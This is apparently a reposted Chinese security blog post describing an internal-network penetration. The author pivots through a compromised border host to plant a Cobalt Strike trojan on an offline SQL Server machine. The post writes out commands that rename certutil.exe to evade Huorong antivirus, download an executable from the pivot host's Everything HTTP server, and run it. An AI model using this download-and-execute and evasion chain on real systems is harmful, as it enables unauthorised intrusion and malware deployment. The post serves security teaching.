场景:
获取到边界主机A权限,进行内网渗透时找到内网主机B的sqlserver账号密码
利用MDUT可成功执行命令
but,主机B不出网,无法直接上CS;无RDP密码,没法直接3389;存在火绒创建账号被拦截。
现在如何能让主机B上线到我们的CS呢?
其实方法有很多,这里我用的是通过中转监听,主机A作为跳板机,生成木马反连。
生成中转木马
这里监听器要把地址换成主机A和主机B互通那张网卡的ip地址
(图是后补的)
接着生成木马
生成之后简单做个免杀(hr还是很好过的)这里就要想办法扔到主机B里面
不过既然我们已经通过MDUT可以执行命令,把马下载下来只是小问题
刚好在边界A主机发现存在Everything软件
通过everything开启http服务,然后把木马放到边界机器上即可
在MDUT里执行
# 因为有个火绒,担心会拦截,所以这里进行了一下简单的绕过
copy C:WindowsSystem32certutil.exe cer.exe
cer -urlcache -split -f "http://192.168.10.1:81/C%3A/Windows/Temp/10.exe" 10.txt
rename 10.txt 10.exe
10.exe
图是后补的,请各位大佬自行脑补
原文始发于微信公众号(零威胁):记录某次内网渗透中everthing的妙用
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论